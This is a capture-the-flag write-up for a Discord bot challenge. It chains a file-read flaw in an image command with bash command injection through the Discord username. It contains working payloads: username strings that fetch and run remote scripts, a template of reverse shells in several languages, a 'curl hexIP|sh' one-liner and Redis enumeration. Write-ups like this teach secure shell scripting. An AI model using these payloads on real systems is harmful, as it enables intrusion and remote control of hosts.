# Flowers Bot Writeup

The link provided with the challenge description can be used to invite a Discord Bot in a Discord server of our choice. Seems like a simple bot to handle things around flowers 🌼.

> This challenge has been solved by multiple teams, exploiting the same vulnerabilities but with different techniques.

First part : 10 solves - Second part : 4 solves

![Flowers Bot - Part 1](./pics/flowers_bot_chall_1_2.png)

![Flowers Bot - Part 2](./pics/flowers_bot_chall_2_2.png)

# Index

- [Flowers Bot Writeup](#flowers-bot-writeup)
- [Index](#index)
- [Get infos](#get-infos)
  - [Usage](#usage)
  - [Description](#description)
- [First part : LFI](#first-part--lfi)
- [Second part : RCE](#second-part--rce)
  - [Grabbing the code](#grabbing-the-code)
  - [Exploring the code](#exploring-the-code)
  - [Calling shellscript ?](#calling-shellscript-)
  - [Researching](#researching)
  - [Reverse shell](#reverse-shell)
  - [➜ With 2 payloads](#-with-2-payloads)
  - [➜ With n payloads](#-with-n-payloads)
  - [➜ With 1 payload](#-with-1-payload)
  - [Explore](#explore)
  - [Redis](#redis)

# Get infos

## Usage

The bot greets us with a help command : `/flowers_help`

![/flowers_help](./pics/flowers_help.png)

- `/beautiful_flower` and `/asian_flower` are similar : returning some flowers pictures
- `/flowerize` prompts the user to upload an image, and a banner on top of it
- `/add-flower` and `/get-flower` are used together :
  - `/add-flower` prompts the user two inputs : a picture and a string
  - the bot seems to store the uploaded image with the specified string as its name
  - `/get-flower` can be used to retrieve previously uploaded images with `/add-flower` using their names
  - the command provides an auto-completion with the names we chose during `/add-flower` uploads

![/add_flower call](pics/add_flower_simple.png)

![/get_flower call](./pics/get_flower_simple.png)

![/get_flower answer](./pics/get_flower_simple_answer.png)

## Description

**The bot description is not entirely visible**, it happens with the PC web clients (Electron app or discordapp.com with a browser), it's cut at `....` (these dots are made by Discord, they are not included in the bot description).

![Bot infos](./pics/bot_informations.png)

- It might be visible in its entirety on some mobile versions
- with the Electron client, it's not possible too see it entirely
- with a browser, and using Discord on `discordapp.com` we can use Dev Tools too see that the rest of the description is simply `hidden` with CSS

![Description entière du bot](./pics/inspecteur_web.png)

➜ **We learn that the bot is backed by Python and deployed with Docker.**

# First part : LFI

**The `/get-flower` bot command is vulnerable to simple LFI** : we can retrieve files from nearly anywhere on the host filesystem.

To demonstrate that :

![LFI test](./pics/lfi_test.png)

![LFI test answer](pics/lfi_test_answer.png)

We can eventually guess the path of the `flag` file :

![LFI guess flag path](pics/lfi_flag_guess.png)

![LFI guess flag path](pics/lfi_flag_guess_answer.png)

**And the file contains the first flag of this challenge 🌼**

```bash
$ cat flag
STHACK{simpleLFIoldButStillGold}
```

> It was possible to guess other files like `README.md` which holds some useful informations, or also the `Dockerfile` which contains some logic and also hints on the bot architecture and absolute paths on the system. We won't use theses guesses for the rest of this writeup since they are not mandatory.

➜ **There are also quite a few shell tricks that can be used to retrieve the `flag` file or more**, without guessing, let's demonstrate that.

For example, to learn more about our process, **we can use `procfs`** (mounted on `/proc` by default) in many ways. Knowing that it's a Python bot, we can try :

![LFI main.py](./pics/lfi_proc_main_py.png)

![LFI main.py](./pics/lfi_proc_main_py_answer.png)

> *Hello dear `main.py`.* The `flag` is also nearby this file.

# Second part : RCE

## Grabbing the code

➜ **We start by LFIing all the code.**

From the `main.py` file we can guess every other files names and paths :

```python
from inventory import add_flower, get_flower
from flower_library import beautiful_flower, asian_flower
from utils import flowers_help
from flowerize import flowerize
```

This, for example indicates that a directory exists in `./inventory/`, it contains a `__init__.py`, and this file includes functions from other files in the same `./inventory/` directory.

Once we got everything LFIed, The code architecture is as follows :

```
❯ tree -L 3
.
└── flowers-bot
    ├── flowerize
    │   ├── flowerize.py
    │   └── __init__.py
    ├── flower_library
    │   ├── asianflower.py
    │   ├── beautifulflower.py
    │   └── __init__.py
    ├── inventory
    │   ├── addflower.py
    │   ├── getflower.py
    │   └── __init__.py
    ├── main.py
    ├── static
    │   ├── asian_flowers
    │   ├── beautiful_flowers
    │   ├── floral_banners
    │   └── txt
    └── utils
        ├── create_user_dir.py
        ├── create_user_dir.sh
        ├── flowerhelp.py
        ├── get_flowers.py
        ├── __init__.py
        ├── log.py
        └── random_unicode_flower.py
```

**Nothing too surprising except** :

- there's **an ugly shellscript** in the name of `./flowers-bot/utils/create_user_dir.sh`
- the code is ugly in general n_n

## Exploring the code

With some reading of the code, we notice that both `/add_flower` and `/flowerize` can lead to execute the shellscript, which might be used for some neat tricks like command injection. 

➜ **Let's focus on the `/add_flower` and `/get_flower` commands** to determine when the shell script is called.

```python
# ./inventory/addflower.py
[...]
# Create user directory on disk if not exists
if not path.exists(f"{OUTDIR}/{interaction.user.name}"):
    create_user_dir(interaction.user.name)
[...]
```

> **Notice that `create_user_dir` function call**, we'll come back to it in a moment.

The bot creates a new directory in some output directory each time a previously unknown user tries to call these commands.

It will then store on disk every file uploaded by a given user in a dedicated directory.

```python
# ./inventory/addflower.py
[...]
# Determine image format and thus, filename
filename = f"{OUTDIR}/{interaction.user.name}/{flower_name}"
await file.save(fp=filename.format(file.filename))
filetype = what(filename)
rename(filename, f"{filename}.{filetype}")
[...]
```

It will also store the name of the file in some Redis server :

```python
# ./inventory/addflower.py
[...]
# Store reference to the image in db
r = Redis('redis', 6379, charset="utf-8", decode_responses=True)
if not r.get(f"{interaction.user.name}"):
    new_list = []
    r.set(f"{interaction.user.name}", dumps(new_list))
user_image_list = loads(r.get(f"{interaction.user.name}"))
user_image_list.append(f"{path.basename(filename)}.{filetype}")
r.set(f"{interaction.user.name}", dumps(user_image_list))
[...]
```

So Redis is used to store the name of every file uploaded, per user. It's then used for suggestions while using the Discord bot command `/get_flower` :

```python
# ./utils/get_flowers.py
[...]
REDIS_HOST = getenv('REDIS_HOST')
r = Redis(REDIS_HOST, 6379, charset="utf-8", decode_responses=True)

if r.get(f"{interaction.user.name}"):
    image_list = loads(r.get(f"{interaction.user.name}"))

    return [
        app_commands.Choice(name=flower, value=flower)
        for flower in image_list
        ][:20]
else:
    return []
[...]
```

## Calling shellscript ?

**Remember that `create_user_dir` function call in `./inventory/addflower.py` ?**

It's basically the infamous shellscript call :

```python
# ./utils/create_user_dir.py
[...]
system(f"{APPDIR}/utils/create_user_dir.sh {username}")
[...]
```

➜ **The username of the user calling the command on Discord is passed as an argument to the script.**

---

This `./utils/create_user_dir.sh` shellscript is responsible for the directory creation.

```bash
# ./utils/create_user_dir.sh
[...]
log INFO "$0 has been called with ${given_user}"
preflight_checks
users=("${output_dir}"/*)
if [[ -v "${users[${given_user}]}" ]] ; then
  log INFO "Directory for user ${given_user} already exists."
else
  log INFO "Directory for user ${given_user} does not exist. Creating..."
  path_sanitize "${given_user}"
  if mkdir "${output_dir}/${given_user}"; then
    log SUCCESS "Directory for user ${given_user} has been successfully created."
  else
    log ERROR "Creation of directory ${output_dir}/${given_user} failed. Exiting."
    exit 1
  fi
fi
[...]
```

The previous excerpt contains the following lines, that holds **[a known `bash` pitfall](https://mywiki.wooledge.org/BashPitfalls#A.5B.5B_-v_hash.5B.24key.5D_.5D.5D)** that can be used for code injection :

```bash
users=("${output_dir}"/*)
if [[ -v "${users[${given_user}]}" ]] ; then
[...]
```

➜ **The first line** retrieves the list of every file and folder in `/app/output/` and stores them in a bash array called `users[]`.

➜ **The second line** tests if the user that has called the command exists in the array, indirectly checking if a folder exists in `/app/output/<USERNAME>`.

➜ **The rest of the code** tries to `mkdir` the folder if does not exists, depending on the result of this test.

Problem is, `bash` is not good at evaluating lines when variables are used as array indexes, because it needs to evaluate two things in the same expression, as in `${users[${given_user}]}`:

- first the value of `${given_user}`
- then, and only then, the value of `${users[${given_user}]}`

**`bash` is doing this in an unsafe way**, where we can inject some code if we control the index called, no matter the syntax (even when double-quoting the array call).

**Well, we do control this input, it's our Discord username.** 🌼

## Researching

**So we can execute shell comands using our Discord username**, if correctly named, with an appropriated syntax. Discord allows only 3 username changes. We need to create more accounts if we want more tries to have a working code execution.

One way to test if our injection is working is to create some file and try to get it back using the previous LFI vulnerability (in a world-writable directory like `/tmp`).

**In order to speed up researches** for a valid payload in the username (since we can change it a few times but we'll need to create new accounts everytime otherwise, and it can be a real pain with email + phone verification everytime), **we can run our own bot** : we did grab all the code with the LFI earlier.

In the Python code, we can change the calls to `interaction.user.name` used to get the user Discord name to `interaction.user.nick` to make the bot use our *"nickname"* (we can change it as many times as we like on a single account) instead of our *"username"* (only 3 changes authorized before we need to create a new account).

A lot of payloads seems to work, with syntaxes like `; shell commands` as Discord name.

> *Challenge author notes* : a few chars should have been banned by a regex, mainly `;`, `&` and `|` to prevent challengers to use classic injections/payloads and force them to leverage the full power of the known bash pitfall discussed earlier (double evaluation in the same expression). I finally remove the regex to make the exploitation easier. As a demonstration, this writeup will include such a solution, bypassing the original escape of `;`, `&` and `|` characters.

We can also call a new bash array, and issue a subsitution inside, with an even uglier payload like : `'a[$(ls)]'`.

**Meaning we need a Discord account with a name like `'a[$(payload)]'`.**

## Reverse shell

**Go reverse shell go.** A classic reverse shell won't do the job since Discord only authorizes names containing 32 characters or less.

A classic `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1` becomes `'a[$(bash -i >& /dev/tcp/10.0.0.1/4 0>&1)]'` to be a valid payload and it's way too long.

We can shorten it a bit with something like `'a[$(sh -i>&/dev/tcp/10.0.0.1/4 0>&1)]'` but not much further and it's still too long.

**So, a lot of techniques can be used here** :

- only one payload, needs a controlled server, outgoing trafic, and a smart script
- two payloads, needs a controlled server, outgoing trafic and a classic script
- n payloads, ad-hoc write
- probably moar

> Having a hand on a really short domain name, only 4-5 characters proved to be useful here.

## ➜ With 2 payloads

The first which grabs an online script, containing our reverse shell : `'a[$(curl IP/a -o /tmp/a]'`

And the second one which executes the script : `'a[$(bash /tmp/a)]'`

---

## ➜ With n payloads

Probably the most painful but that requires the least culture/knowledge about reverse shells.

Three accounts to write a file that contains our reverse shell :

- First Discord account : `'a[$(echo /dev/tcp/10.>/tmp/a)]'`
- Second Discord account : `'a[$(echo .0.0.1/4 >>/tmp/a)]'`
- Third Discord account : `'a[$(echo 0\>\&1>>/tmp/a)]'`

And a fourth one to trigger the execution of the script : `'a[$(bash /tmp/a)]'`

---

## ➜ With 1 payload

> **Technique used by TomFox to solve this step, a neat little trick.**

The idea is to combine two tricks : IP as hex values and and webserver that is able to use an existing TCP tunnel to spawn the rev shell.

Serve a Python webserver on a machine you control :

```python
# server.py
import http.server
import sys

script = open("./template", "rb").read()

class MyHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        ip = self.headers.get('Host')
        self.wfile.write(script.replace(b"IP", ip.encode()).replace(b"PORT", sys.argv[1].encode()))

httpd = http.server.HTTPServer(("0.0.0.0", 80), MyHandler)
httpd.handle_request()
```

With the following as `./template` :

```bash
if command -v python > /dev/null 2>&1; then
        python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")';
        exit;
fi
if command -v perl > /dev/null 2>&1; then
        perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
        exit;
fi
if command -v nc > /dev/null 2>&1; then
        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
        exit;
fi
if command -v socat > /dev/null 2>&1; then
        socat TCP:IP:PORT EXEC:/bin/sh
        exit;
fi
if command -v sh > /dev/null 2>&1; then
        /bin/sh -i >& /dev/tcp/IP/PORT 0>&1
        exit;
fi
if command -v php > /dev/null 2>&1; then
        php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh <&3 >&3 2>&3");'
        exit;
fi
if command -v ruby /dev/null 2>&1; then
        ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("IP",PORT))'
        exit;
fi
```

Run it with the following :

```bash
$ PORT=$(shuf -i 2000-65000 -n 1);(python3 ./server.py ${PORT} &) && pwncat-cs -lp ${PORT}
```

Convert to hex the IP of the server you control :

```bash
$ printf '%02X' <IP> ; echo
```

And then, the payload to spawn the reverse shell on the remote machine is `curl 0x8a5dbf0d|sh`  where `0x8a5dbf0d` is the hex value of your IP address, which becomes `'a[$(curl 0x8a5dbf0d|sh)]'` with the aforementioned technique.

---

## Explore

**Once the reverse shell** is set up, we can explore a little bit.

As previously mentioned earlier, the app is deployed with Docker, and we can easily see a `Dockerfile` and `docker-compose.yml` in the main directory of the app which seems to be `/app/flowers-bot` inside a container.

```bash
flowers-bot@0c8692a8ff92:/app/flowers-bot$ ls
flower_library  flowerize  inventory  main.py  requirements.txt  static  utils

flowers-bot@0c8692a8ff92:/app/flowers-bot$ ls /app
Dockerfile  README.md  docker-compose-dev.yml  docker-compose.yml  flag  flowers-bot  output
```

Let's see both of these files :

```yml
# /app/docker-compose.yml
version: "3"
services:
  flowers-bot:
    container_name: flowers-bot
    image: flowers-bot:latest
    build:
      context: ./
      args:
        - flag=testflag
    volumes:
      - ./output:/app/output
      - /etc/localtime:/etc/localtime:ro
    user: "2789"
    restart: always

  redis:
    container_name: flowers-bot-db
    image: redis
    restart: always

volumes:
  output:
```

```Dockerfile
# /app/Dockerfile
FROM python:3.10.10-bullseye

RUN groupadd -g 2789 flowers-bot \
    && useradd -m -u 2789 -g 2789 -s /bin/bash flowers-bot

ARG flag

COPY . /app

RUN echo $flag > /app/flag \
    && chown root:root /app/flag \
    && chmod 444 /app/flag

WORKDIR /app/flowers-bot

USER flowers-bot

RUN pip install -r requirements.txt

CMD [ "python", "main.py" ]
```

There's a `flag` mentioned here but it's the first one found using the LFI.

It seems to be possible to connect to the Redis server, since it has no particular configuration, using `redis` as hostname, leveraging the name resolution provided by `docker compose`.

## Redis

`redis-cli` is not installed in the machine, and we're not `root` so no package installations. We'll instead leverage Python and the `redis` lib that is used by the bot itself.

Let's create a file `/tmp/redis.py` :

```python
# /tmp/redis.py
from redis import Redis
r = Redis("redis") # hostname is "redis", as seen in the `docker-compose.yml`
for key in r.scan_iter():
       print key
```

A key called `flag` pops up, let's grab the associated data by adding this to our Python script :

```python
# /tmp/redis.py
[...]
r.get("flag")
```

**And running this query, the second flag falls 🌼 `STHACK{bashIsOftenBrokenBeCarefulWithShellscripts}`.**
